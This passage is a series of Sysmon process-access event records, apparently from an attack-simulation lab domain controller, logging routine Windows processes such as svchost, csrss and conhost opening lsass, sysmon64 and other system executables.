{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6396,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6397,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-001079AC0900}\r\nSourceProcessId: 4932\r\nSourceThreadId: 3180\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-0010C4AB0900}\r\nTargetProcessId: 3716\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-001079AC0900}","SourceProcessId":"4932","SourceThreadId":"3180","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-0010C4AB0900}","TargetProcessId":"3716","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6398,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.554\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1260\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-001035AE0900}\r\nTargetProcessId: 3980\r\nTargetImage: C:\\Windows\\system32\\speech_onecore\\common\\SpeechModelDownload.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\UBPM.dll+ac60|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.554","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1260","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-001035AE0900}","TargetProcessId":"3980","TargetImage":"C:\\Windows\\system32\\speech_onecore\\common\\SpeechModelDownload.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\UBPM.dll+ac60|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6399,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.554\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-001035AE0900}\r\nTargetProcessId: 3980\r\nTargetImage: C:\\Windows\\system32\\speech_onecore\\common\\SpeechModelDownload.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.554","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-001035AE0900}","TargetProcessId":"3980","TargetImage":"C:\\Windows\\system32\\speech_onecore\\common\\SpeechModelDownload.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6400,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.554\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.554","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6401,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.554\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.554","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6402,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.554\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.554","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6403,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.554\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.554","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6404,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.554\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 